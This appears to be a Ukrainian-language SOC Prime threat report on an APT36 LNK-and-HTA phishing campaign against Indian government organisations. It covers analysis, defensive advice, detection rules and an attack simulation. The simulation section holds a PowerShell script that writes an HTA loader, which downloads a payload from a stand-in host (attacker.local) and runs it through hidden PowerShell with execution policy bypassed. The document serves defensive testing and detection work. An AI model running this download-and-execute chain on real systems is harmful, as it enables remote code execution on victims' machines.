SOC Prime Bias: Критичний

05 Jan 2026 15:57 UTC

APT36: Багатоступенева кампанія з використанням LNK-зловмисного ПЗ, спрямована на індійські урядові організації

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Стежити
APT36: Багатоступенева кампанія з використанням LNK-зловмисного ПЗ, спрямована на індійські урядові організації
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

APT36 (Transparent Tribe) провела фішингову кампанію з використанням шкідливого ярлика LNK, що маскувався під PDF. Після відкриття ярлик запускає mshta.exe для виконання завантажувача на основі HTA, що дешифрує та завантажує шкідливі компоненти в пам’ять, включаючи конфігураційний модуль та DLL з усіма функціями RAT. Шкідливе ПЗ динамічно вибирає методи постійного збереження на основі встановленого продукту антивірусного захисту жертви та підключається до сервера управління через зашифрований канал. Діяльність оцінюється як зосереджена на шпигунстві, націлена на індійські урядові та освітні організації для крадіжки даних.

Розслідування

Дослідники проаналізували незвично великий файл LNK, відслідкували вбудований HTA-контент, розміщений на innlive.in, і реверсували логіку дешифрування. Ланцюг розкрив два основних етапи: десеріалізований навантажувач .NET для послаблення або обходу перевірок безпеки, а також DLL-файл без завантаження на диск (напр. ki2mtmkl.dll / iinneldc.dll), що надає функціональність RAT. Поведінку постійності зіставлено з певними антивірусними продуктами, а ключові деталі C2, такі як TCP порт 8621 та AES ключ , що використовувався для зашифрованого трафіку, були вилучені під час аналізу.

Захист

Обмежте або карантинно відправляйте ярлики (.lnk), що пришли через електронну пошту, особливо якщо вони запаковані в ZIP-архіви. Застосуйте політики контролю застосунків для обмеження виконання mshta.exe, PowerShell та інших движків сценаріїв з шляхів, доступних для запису користувача. Використовуйте виявлення кінцевих точок для процесних ланцюгів, що включають mshta.exe та індикатори виконання DLL в пам’яті, і насильно вводьте суворі засоби контролю виведення для блокування зв’язку з невідомими або недовіреними доменами.

Відповідь

Якщо виявлено підозріле виконання LNK, ізолюйте систему, зробіть знімки пам’яті та проведіть пошук індикаторів DLL в пам’яті, пов’язаних з етапом RAT. Заблокуйте ідентифіковані шкідливі домени та відповідну інфраструктуру IP і обертайте потенційно скомпрометовані облікові дані. Проведіть судово-медичну перевірку, щоб знайти артефакти постійності у папці запуску та реєстрі, видаліть їх і підтвердьте, що ніякі додаткові домівки не залишилися.

Поток атак

Детекції

Можливий Шкідливий Файл LNK з Подвійним Розширенням (через cmdline)

Команда SOC Prime
05 січня 2026 року

Підозріла Поведінка Уникнення Захисту LOLBAS MSHTA шляхом Виявлення Зв’язаних Команд (через process_creation)

Команда SOC Prime
05 січня 2026 року

Підозрілі Бінарні файли / Скрипти у Місці Автозапуску (через file_event)

Команда SOC Prime
05 січня 2026 року

Підозрілі Файли у Загальному Профілі Користувача (через file_event)

Команда SOC Prime
05 січня 2026 року

Підозріле Виконання з Загального Профілю Користувача (через process_creation)

Команда SOC Prime
05 січня 2026 року

IOC (SourceIP) для виявлення: APT36 : Багатоступенева Кампанія LNK для Ураження Індійських Державних Органів

AI Правила SOC Prime
05 січня 2026 року

IOC (HashSha256) для виявлення: APT36 : Багатоступенева Кампанія LNK для Ураження Індійських Державних Органів

AI Правила SOC Prime
05 січня 2026 року

IOC (DestinationIP) для виявлення: APT36 : Багатоступенева Кампанія LNK для ураження індійських державних органів

AI Правила SOC Prime
05 січня 2026 року

Виконання mshta.exe з PowerShell або CMD [Створення Процесу в Windows]

AI Правила SOC Prime
05 січня 2026 року

Виявлення Шкідливого Домену APT36 та Комунікацій C2 [Мережева З’єднання Windows]

AI Правила SOC Prime
05 січня 2026 року

Виявлення Жорстко закодованого AES ключа у Кампанії APT36 [Sysmon Windows]

AI Правила SOC Prime
05 січня 2026 року

Виконання Симуляції

Попередні вимоги: Перевірка Телеметрії та Базова Перевірка повинна бути успішною.

Мотивування: У цьому розділі детально описуються точні дії стратегії супротивника (TTP), розроблені для активації правила виявлення. Команди та наративи ПОВИННІ безпосередньо відображати визначені TTP і спрямовані на генерацію точної телеметрії, очікуваної логікою виявлення.

  • Описи Атак та Команди:
    Супротивник отримав доступ з низькими привілеями через PowerShell на скомпрометованій робочій станції. Для виконання віддаленого навантаження без запису виконуваного файлу на диск, зловмисник використовує mshta.exe для запуску HTA-файлу, що завантажує бекдор PowerShell з сервера C2. Кроки такі:

    1. Закодуйте мінімальний шкідливий HTA, що запускає PowerShell для завантаження та виконання навантаження.
    2. Розмістіть HTA на веб-сервері (наприклад, http://attacker.local/malicious.hta).
    3. З скомпрометованої сесії PowerShell викличте mshta.exe з віддаленим URL-адресою як аргументом.

    Цей ланцюг створює подію створення процесу , де mshta.exe є дочірнім процесом для powershell.exe, точно відповідаючи правилу Sigma.

  • Скрипт Регресійного Тестування:

    #-------------------------------------------------
    # Симульований скрипт атакера – активує правило
    #-------------------------------------------------
    
    # 1. Визначте шкідливий HTA (вбудований для демонстраційних цілей)
    $htaContent = @"
    
        // Завантажити та виконати фіктивне навантаження PowerShell
        var url = 'http://attacker.local/payload.ps1';
        var xhr = new ActiveXObject('Microsoft.XMLHTTP');
        xhr.open('GET', url, false);
        xhr.send();
        var ps = new ActiveXObject('WScript.Shell');
        ps.Run('powershell -NoProfile -ExecutionPolicy Bypass -Command "' + xhr.responseText + '"', 0, false);
    
    "@
    
    # 2. Запишіть HTA у тимчасове розташування (імітація розміщеного файлу)
    $tempPath = "$env:TEMPmalicious.hta"
    $htaContent | Set-Content -Path $tempPath -Encoding ASCII
    
    # 3. Запустіть mshta.exe з PowerShell (тригер виявлення)
    $mshta = (Get-Command mshta.exe).Source
    Write-Host "[*] Запуск mshta.exe для виконання HTA-навантаження..."
    Start-Process -FilePath $mshta -ArgumentList "`"$tempPath`"" -NoNewWindow
    
    # Опціонально: Сон для дозволу фіксації події
    Start-Sleep -Seconds 5
    
    # Очищення (здійснюється у наступному розділі)
  • Команди Очистки:

    # Видалити тимчасовий файл HTA
    Remove-Item -Path "$env:TEMPmalicious.hta" -Force -ErrorAction SilentlyContinue
    
    # Зупинити всі залишкові процеси mshta.exe (малоймовірно після звичайного виконання)
    Get-Process -Name mshta -ErrorAction SilentlyContinue | Stop-Process -Force
    
    Write-Host "[*] Очищення завершено."